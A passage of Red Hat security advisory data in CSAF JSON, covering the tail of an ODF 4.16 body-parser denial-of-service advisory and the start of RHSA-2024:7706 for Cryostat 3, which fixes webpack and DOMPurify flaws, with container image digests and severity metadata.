"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "body-parser: Denial of Service Vulnerability in body-parser"
}
]
}
rhsa-2024_7706
Vulnerability from csaf_redhat
Published
2024-10-07 01:12
Modified
2024-11-06 07:10
Summary
Red Hat Security Advisory: Red Hat build of Cryostat security update
Notes
Topic
An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.
Security Fix(es):
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* dompurify: XSS vulnerability via prototype pollution (CVE-2024-45801)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.\n\nSecurity Fix(es):\n\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n* dompurify: XSS vulnerability via prototype pollution (CVE-2024-45801)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:7706",
"url": "https://access.redhat.com/errata/RHSA-2024:7706"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2312631",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312631"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7706.json"
}
],
"title": "Red Hat Security Advisory: Red Hat build of Cryostat security update",
"tracking": {
"current_release_date": "2024-11-06T07:10:18+00:00",
"generator": {
"date": "2024-11-06T07:10:18+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.1.1"
}
},
"id": "RHSA-2024:7706",
"initial_release_date": "2024-10-07T01:12:29+00:00",
"revision_history": [
{
"date": "2024-10-07T01:12:29+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-10-07T01:12:29+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-11-06T07:10:18+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Cryostat 3 on RHEL 8",
"product": {
"name": "Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:cryostat:3::el8"
}
}
}
],
"category": "product_family",
"name": "Cryostat"
},
{
"branches": [
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"product": {
"name": "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"product_id": "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-db-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"product": {
"name": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"product_id": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-grafana-dashboard-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"product": {
"name": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"product_id": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"product": {
"name": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"product_id": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-reports-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"product": {
"name": "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"product_id": "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"product": {
"name": "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"product_id": "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-operator-bundle\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"product": {
"name": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"product_id": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-rhel8-operator\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"product": {
"name": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"product_id": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-storage-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"product": {
"name": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"product_id": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/jfr-datasource-rhel8\u0026tag=3.0.1-3"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"product": {
"name": "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"product_id": "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-db-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"product": {
"name": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"product_id": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-grafana-dashboard-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"product": {
"name": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"product_id": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"product": {
"name": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"product_id": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-reports-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"product": {
"name": "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"product_id": "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"product": {
"name": "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"product_id": "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-operator-bundle\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"product": {
"name": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"product_id": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-rhel8-operator\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"product": {
"name": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"product_id": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-storage-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
